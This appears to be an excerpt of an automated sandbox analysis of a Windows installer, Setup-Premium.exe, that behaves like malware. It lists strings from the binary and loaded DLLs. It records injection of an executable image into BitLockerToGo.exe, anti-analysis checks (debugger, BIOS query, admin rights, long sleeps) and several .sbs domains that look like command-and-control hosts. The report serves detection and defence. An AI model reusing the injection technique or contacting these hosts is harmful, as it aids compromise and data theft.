Source: Setup-Premium.exe | String found in binary or memory: lock: lock countbad system huge page sizearena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartunexpected key value typeExpandEnvironmentStringsWx509: invalid RDNSequencex509: invalid RSA modulusx509: malformed extensionx509: malformed signaturecontext deadline exceededjson: Unexpected key typereflect.Value.OverflowIntjson: unsupported value: not at beginning of valueecdsa: invalid public keyerror during PEM decoding2910383045673370361328125proposedContent.verifierscontent.payloadHash.valuefailure generating objectmissing signature contentmissing publicKey contentunknown Go type for sliceexplicit tag has no childinvalid object identifierhttp: invalid cookie namehttp2: Request.URI is niltext/plain; charset=utf-8http: invalid Cookie.Namehttp2: Framer %p: read %vframe_data_pad_byte_shortframe_settings_has_streamframe_headers_zero_streamframe_headers_pad_too_bigframe_priority_bad_lengthhttp2: invalid header: %vstrict-transport-securityhttp2: unsupported schemeread_frame_unexpected_eof{...} wildcard not at endhttp: invalid Host headerport number out of range invalid username/passwordmissing envelope propertybytes,1071,opt,name=rulesleading_detached_commentsreflect: Bits of nil Typereflect.StructOf: field "reflect.Value.SetMapIndextls: protocol is shutdownno answer from DNS serverno suitable address foundunexpected '[' in addressunexpected ']' in addressContent-Transfer-Encodingnet/url: invalid userinfoGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorSetSecurityDescriptorDaclSetSecurityDescriptorSaclFindNextVolumeMountPointWFindVolumeMountPointCloseQueryInformationJobObjectNtQueryInformationProcessSetupDiCallClassInstallerSetupDiGetDevicePropertyWSetupDiGetSelectedDriverWSetupDiSetSelectedDriverW with too many arguments inconsistent poll.fdMutexGODEBUG: can not enable "unsupported type %T, a %smail: unclosed angle-addrmail: leading dot in atomcharset not supported: %q^(?:[0-9]{9}X|[0-9]{10})$%s must be of type %s: %q%s should be less than %v%d error(s) decoding:
Source: Setup-Premium.exe | String found in binary or memory: tableLog (%d) > maxTableLog (%d)unexpected null character (0x00)sha3: write to sponge after readSigEd25519 no Ed25519 collisionsblake2s: write to XOF after readMILESTONE_FIELD_NAME_REACHED_DATEjetstream not enabled for accountnats: context requires a deadlinerelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangex509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto: requested hash function #SigEd25519 no Ed25519 collisions
                  Source: Setup-Premium.exeString found in binary or memory: tableLog (%d) > maxTableLog (%d)unexpected null character (0x00)sha3: write to sponge after readSigEd25519 no Ed25519 collisionsblake2s: write to XOF after readMILESTONE_FIELD_NAME_REACHED_DATEjetstream not enabled for accountnats: context requires a deadlinerelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangex509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto: requested hash function #SigEd25519 no Ed25519 collisions
                  Source: Setup-Premium.exeString found in binary or memory: string field contains invalid UTF-8%v already implements proto.Messagemlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset expect [ or , or ] or n, but found invalid control character found: %dtransform: short destination bufferbytes,291403980,opt,name=field_infomessage %v cannot be extended by %v%s: none of the oneof fields is setcannot decode %v into a primitive.Dcannot decode %v into a string typecannot decode %v into a json.Numberbson.Element{[%s]"%s": <malformed>}missing EncodeTime in EncoderConfigchacha20: output smaller than inputcrypto/blake2b: cannot marshal MACsunsupported cipher in private key: Reserved for backward compatibilityfailed to set value %#v to field %sunpaired removeDep: no %T dep on %Tfile %q has a name conflict over %vfound wrong type: got %v, want enumfield match condition not found in BUG: accessing uninitialized bucket%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0Error while reading from Writer: %s%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32bad successive approximation valueshttp2: scheme must be http or https%d response missing Location headerhttp2: Framer %p: read %v. 
Type: %vPUSH_PROMISE frame with stream ID 0unknown compression method name: %sdelimiters may only be "{}" or "<>"truncated input (or invalid offset)incompatible period types %v and %vincompatible sample types %v and %vmultiple functions with same id: %dmultiple locations with same id: %dpprof: use of uninitialized Profileruntime/pprof: converting profile: mismatched profile records and tagsbasic strings cannot have new linesTLS_KRB5_EXPORT_WITH_DES_CBC_40_SHATLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHATLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5TLS_DHE_DSS_WITH_AES_128_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_CBC_SHA256TLS_DHE_DSS_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_256_CBC_SHA256TLS_DH_anon_WITH_AES_128_CBC_SHA256TLS_DH_anon_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_GCM_SHA256TLS_DHE_RSA_WITH_AES_256_GCM_SHA384TLS_DHE_DSS_WITH_AES_128_GCM_SHA256TLS_DHE_DSS_WITH_AES_256_GCM_SHA384TLS_DH_anon_WITH_AES_128_GCM_SHA256TLS_DH_anon_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_GCM_SHA256TLS_DHE_PSK_WITH_AES_256_GCM_SHA384TLS_RSA_PSK_WITH_AES_128_GCM_SHA256TLS_RSA_PSK_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_CBC_SHA256TLS_DHE_PSK_WITH_AES_256_CBC_SHA384TLS_RSA_PSK_WITH_AES_128_CBC_SHA256TLS_RSA_PSK_WITH_AES_256_CBC_SHA384TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHATLS_ECDH_ECDSA_WITH_AES_256_CBC_SHATLS_ECDH_anon_WITH_3DES_EDE_CBC_SHATLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHATLS_DH_DSS_WITH_ARIA_128_CBC_SHA256TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256TLS_DH_RSA_WITH_ARIA_256_
                  Source: Setup-Premium.exeString found in binary or memory: string field contains invalid UTF-8%v already implements proto.Messagemlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset expect [ or , or ] or n, but found invalid control character found: %dtransform: short destination bufferbytes,291403980,opt,name=field_infomessage %v cannot be extended by %v%s: none of the oneof fields is setcannot decode %v into a primitive.Dcannot decode %v into a string typecannot decode %v into a json.Numberbson.Element{[%s]"%s": <malformed>}missing EncodeTime in EncoderConfigchacha20: output smaller than inputcrypto/blake2b: cannot marshal MACsunsupported cipher in private key: Reserved for backward compatibilityfailed to set value %#v to field %sunpaired removeDep: no %T dep on %Tfile %q has a name conflict over %vfound wrong type: got %v, want enumfield match condition not found in BUG: accessing uninitialized bucket%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0Error while reading from Writer: %s%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32bad successive approximation valueshttp2: scheme must be http or https%d response missing Location headerhttp2: Framer %p: read %v. 
Type: %vPUSH_PROMISE frame with stream ID 0unknown compression method name: %sdelimiters may only be "{}" or "<>"truncated input (or invalid offset)incompatible period types %v and %vincompatible sample types %v and %vmultiple functions with same id: %dmultiple locations with same id: %dpprof: use of uninitialized Profileruntime/pprof: converting profile: mismatched profile records and tagsbasic strings cannot have new linesTLS_KRB5_EXPORT_WITH_DES_CBC_40_SHATLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHATLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5TLS_DHE_DSS_WITH_AES_128_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_CBC_SHA256TLS_DHE_DSS_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_256_CBC_SHA256TLS_DH_anon_WITH_AES_128_CBC_SHA256TLS_DH_anon_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_GCM_SHA256TLS_DHE_RSA_WITH_AES_256_GCM_SHA384TLS_DHE_DSS_WITH_AES_128_GCM_SHA256TLS_DHE_DSS_WITH_AES_256_GCM_SHA384TLS_DH_anon_WITH_AES_128_GCM_SHA256TLS_DH_anon_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_GCM_SHA256TLS_DHE_PSK_WITH_AES_256_GCM_SHA384TLS_RSA_PSK_WITH_AES_128_GCM_SHA256TLS_RSA_PSK_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_CBC_SHA256TLS_DHE_PSK_WITH_AES_256_CBC_SHA384TLS_RSA_PSK_WITH_AES_128_CBC_SHA256TLS_RSA_PSK_WITH_AES_256_CBC_SHA384TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHATLS_ECDH_ECDSA_WITH_AES_256_CBC_SHATLS_ECDH_anon_WITH_3DES_EDE_CBC_SHATLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHATLS_DH_DSS_WITH_ARIA_128_CBC_SHA256TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256TLS_DH_RSA_WITH_ARIA_256_
                  Source: Setup-Premium.exeString found in binary or memory: x509: certificate is not valid for any names, but wanted to match x509: requested SignatureAlgorithm does not match private key typeunable to process scalar node. Got %q. Expecting float content: %w[GET /api/v1/log/entries/{entryUUID}][%d] getLogEntryByUuidOK %+vaccepted signatures do not match threshold, Found: %d, Expected %dreflect: indirection through nil pointer to embedded struct field tls: certificate private key (%T) does not implement crypto.Signerclient doesn't support ECDHE, can only use legacy RSA key exchangetls: server sent an unexpected quic_transport_parameters extensionpkcs7: signing time %q is outside of certificate validity %q to %qcryptobyte: high-tag number identifier octects not supported: 0x%xinternal error: attempted to parse unknown event (please report): If non-empty, use this log file (no effect when -logtostderr=true)If true, adds the file directory to the header of the log messagesDescriptor.Options called without importing the descriptor packagedocument end byte found before end of document. 
remaining bytes=%vinternal error: expected cumul[s.symbolLen] (%d) == tableSize (%d)uconn.Extensions contains %v separate SupportedVersions extensionstls: writeToUConn is not implemented for the PreSharedKeyExtensiontls: InitializeByUtls failed: the session is not a tls 1.2 sessiontoml: key %s already exists as a %s, but should be an array tablecannot create a subscription for a consumer with a deliver group %q[POST /api/v1/log/entries/retrieve][%d] searchLogQuery default %+vtbsCertList.revokedCertificates.crlEntryExtensions.*.InvalidityDatetls: server sent certificate containing RSA key larger than %d bitsif non-empty, httptest.NewServer serves on this address and blocks.field %v with invalid Mutable call on field with non-composite typeSliceDecodeValue can only decode a binary into a byte array, got %vSliceDecodeValue can only decode a string into a byte array, got %vtls: IsInitialized is not implemented for the PreSharedKeyExtension((a)naly|(b)a|(d)iagno|(p)arenthe|(p)rogno|(s)ynop|(t)he)(sis|ses)$FileAlignment lesser than 0x200 and different from section alignmentdamaged Import Table information. ILT and/or IAT appear to be broken2695994666715063979466701508701963067355791626002630814351006629888126959946667150639794667015087019625940457807714424391721682722368061unable to process scalar node. Got %q. Expecting integer content: %w[GET /api/v1/log/entries/{entryUUID}][%d] getLogEntryByUuidNotFound padding bytes must all be zeros unless AllowIllegalWrites is enabledhttp2: Transport conn %p received error from processing frame %v: %vhttp2: Transport received unsolicited DATA frame; closing connectionhttp: message cannot contain multiple Content-Length headers; got %qx509: failed to unmarshal certificate list authority info access: %vreflect: reflect.Value.UnsafePointer on an invalid notinheap pointertls: internal error: sending non-handshake message to QUIC transportbig: invalid 2nd argument to Int.Jacobi: need odd integer bu
                  Source: Setup-Premium.exe | String found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.8.0h1:YQFtbBQb4VrpoPxhFuzEBPQ9E16qz5SpHLS+uswaCp8=
                  Source: Setup-Premium.exe | String found in binary or memory: depgithub.com/go-openapi/loadsv0.22.0h1:ECPGd4jX1U6NApCGG1We+uEozOAvXvJSF4nnwHZ8Aco=
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads.init.0
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads.(*loader).WithHead
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads.(*loader).Load
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads.JSONDoc
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads.init.1
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads.init.0.func1
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads.(*loader).Load-fm
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsNotFound.Error
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsNotFound.NotFound
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingServerURL.Error
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingServerURL.InvalidParameter
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingUsername.Error
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingUsername.InvalidParameter
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsNotFound).Error
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsNotFound).NotFound
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingServerURL).Error
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingServerURL).InvalidParameter
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingUsername).Error
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingUsername).InvalidParameter
                  Source: Setup-Premium.exe | String found in binary or memory: type:.eq.github.com/docker/docker-credential-helpers/credentials.Credentials
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.Store
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.isValidCredsMessage
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsCredentialsMissingServerURLMessage
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsCredentialsMissingUsernameMessage
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.Get
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsErrCredentialsNotFoundMessage
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.Erase
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.List
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.createProgramCmdRedirectErr
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.(*Shell).Output
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.(*Shell).Input
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsErrCredentialsNotFound
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.NewShellProgramFunc
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers/client.NewShellProgramFuncWithEnv
                  Source: Setup-Premium.exe | String found in binary or memory: net/addrselect.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/sigstore/sigstore@v1.8.9/pkg/signature/options/loadoptions.go
                  Source: Setup-Premium.exe | String found in binary or memory: google.golang.org/genproto/googleapis/api@v0.0.0-20240827150818-7e3bb234dfed/launch_stage.pb.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/swag@v0.23.0/loading.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads@v0.22.0/loaders.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads@v0.22.0/spec.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers@v0.8.0/credentials/error.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers@v0.8.0/client/client.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/docker-credential-helpers@v0.8.0/client/command.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/docker/distribution@v2.8.3+incompatible/registry/client/auth/challenge/addr.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/magiconair/properties@v1.8.7/load.go
                  Source: Setup-Premium.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                  Source: Setup-Premium.exe | String found in binary or memory: google/api/launch_stage.proto
                  Source: Setup-Premium.exe | String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | File read: C:\Users\user\Desktop\Setup-Premium.exe
                  Source: unknown | Process created: C:\Users\user\Desktop\Setup-Premium.exe "C:\Users\user\Desktop\Setup-Premium.exe"
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Section loaded: powrprof.dll
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Section loaded: umpdc.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: amsi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: version.dll
                  Source: Setup-Premium.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                  Source: Setup-Premium.exe | Static file information: File size 22590464 > 1048576
                  Source: Setup-Premium.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0xa0cc00
                  Source: Setup-Premium.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa44800
                  Source: Setup-Premium.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: BitLockerToGo.pdb | source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdbGCTL | source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Setup-Premium.exe | Static PE information: section name: .symtab
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0044876C push esp; retf 0047h 2_2_0044876D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00448770 push esp; retf 0047h 2_2_00448771
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043DA60 push eax; mov dword ptr [esp], 37363908h 2_2_0043DA65
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00448C8B push esp; retf 0047h 2_2_00448C95
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00448D4B push eax; retf 2_2_00448D4D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00449E6E push ebx; retf 2_2_00449E6F
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043DE30 push eax; mov dword ptr [esp], FCFDFEFFh 2_2_0043DE3A
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Check user administrative privileges: IsUserAndAdmin, DecisionNode graph_2-18339
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4308 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EEC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWz'
                  Source: Setup-Premium.exe, 00000000.00000002.2171311067.0000000001F2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | API call chain: ExitProcess graph end node graph_2-18340
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process queried: DebugPort
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043ACB0 LdrInitializeThunk, 2_2_0043ACB0

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: drawwyobstacw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: condifendteu.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: ehticsprocw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: vennurviot.sbsz
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: resinedyw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: enlargkiw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: allocatinow.sbs
